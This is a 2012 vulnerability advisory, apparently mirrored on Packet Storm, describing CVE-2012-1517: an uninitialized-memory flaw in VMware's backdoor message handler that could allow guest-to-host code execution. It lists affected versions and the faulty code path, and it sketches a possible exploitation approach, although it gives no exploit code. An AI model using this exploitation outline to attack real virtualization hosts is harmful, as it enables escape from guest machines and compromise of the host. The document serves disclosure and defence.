seeing is believing

VMware Backdoor ghi.guest.trashFolder.state Uninitialized Memory

VMware Backdoor ghi.guest.trashFolder.state Uninitialized Memory
Posted May 8, 2012
Authored by Derek Soeder

The vulnerability described in this document could hypothetically be exploited by unprivileged code running in a VMware virtual machine (guest) in order to execute code in the host VMX process, thereby breaking out of the virtual machine; however, such exploitation has not been proven.

tags | advisory
advisories | CVE-2012-1517
MD5 | 23a15e8e5f4e8c749191a128067b6a74

VMware Backdoor ghi.guest.trashFolder.state Uninitialized Memory

Change Mirror Download
VMware Backdoor ghi.guest.trashFolder.state Uninitialized Memory
Potential VM Break

Derek Soeder
ds.adv.pub@gmail.com

Reported: December 5, 2011
Published: May 3, 2012


AFFECTED VENDOR
---------------
VMware, Inc.


AFFECTED ENVIRONMENTS
---------------------
The following VMware product versions are known to be affected:
VMware Workstation 7.0.0
VMware Workstation 7.1.5 and earlier
VMware Player 3.1.5 and earlier
VMware ESXi 4.1.0 Update 2 Build 502767 and earlier
Other related versions not tested due to unavailability


UNAFFECTED ENVIRONMENTS
-----------------------
VMware Server 1.0.x
VMware Server 2.0.x
VMware Workstation 8.0.x
VMware Player 4.0.x
VMware ESXi 3.5.0
VMware ESXi 4.0.0
VMware ESXi 5.0.0
Other related versions not tested due to unavailability


IDENTIFIERS
-----------
CVE-2012-1517


IMPACT
------
The vulnerability described in this document could hypothetically be
exploited by unprivileged code running in a VMware virtual machine
(guest) in order to execute code in the host VMX process, thereby
breaking out of the virtual machine; however, such exploitation has
not been proven.


VULNERABILITY DETAILS
---------------------
The VMware backdoor interface consists of a number of operations
issued via I/O instructions executed in the guest with a command
number in CX and data or "magic" values in a number of other
registers. Command 0x1E / 30 (BDOOR_CMD_MESSAGE) and its subcommands
(MESSAGE_TYPE_*) allow messages to be exchanged between the guest and
host.

Messages from the guest take the form of a command string followed by
any number of arguments. When the guest issues a command message, the
command dispatcher in the host VMX process calls a handler function
associated with the given command that is prototyped roughly as
follows:

bool __cdecl CommandHandler(
void * unknown,
short channel,
char * args,
unsigned int args_len,
char * * preply,
unsigned int * preply_len)

The handler for the "ghi.guest.trashFolder.state" command, available
in newer versions of VMware products, checks for an empty argument
string by comparing 'args' to null and 'args_len' to zero, and if
either matches, the function fails with the error message "Invalid
parameters". However, this particular failure path skips a call that
initializes a local variable, an XDR structure. Before the handler
function returns--even in the event of failure--it retrieves the
'x_ops' pointer from the structure at offset +0x04 (32-bit) / +0x08
(64-bit), which points to a table of function pointers, and it then
calls the eighth function pointer, 'x_destroy', at offset +0x1C
(32-bit) / +0x38 (64-bit) within the table.


EXPLOITATION
------------
Since the stack memory that constitutes the structure remains
uninitialized when the handler function processes a
"ghi.guest.trashFolder.state" command with no arguments, the guest
could hypothetically proffer an arbitrary function pointer table
pointer by first causing some other operation to be performed by the
thread that will execute the handler function, thereby seeding that
portion of stack memory. Successful exploitation would then depend on
being able to find or establish a useful function pointer table and
code to execute.

At least on a Windows host, procurement of a function pointer table
might be facilitated by the fact that the VMX executable cannot be
relocated. Furthermore, the VMX process often features PAGE_READWRITE
mappings of guest physical memory at predictable addresses. It might
also be possible to fill the VMX process's heap by issuing other
backdoor commands.


MITIGATION
----------
None known.


CONCLUSION
----------
This document discloses a vulnerability in more recent versions of
VMware products that could potentially allow a guest to execute
arbitrary code on the host system, although an unsuccessful
exploitation attempt will likely crash the guest.

The exploitability of this vulnerability is most contingent on the
ability to control the contents of the relevant, uninitialized stack
memory from the guest, which has not yet been demonstrated. If that
proves to be possible, eventual reliable exploitation should be
considered likely.


GREETINGS
---------
www.ftmband.com
www.ridgewayis.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close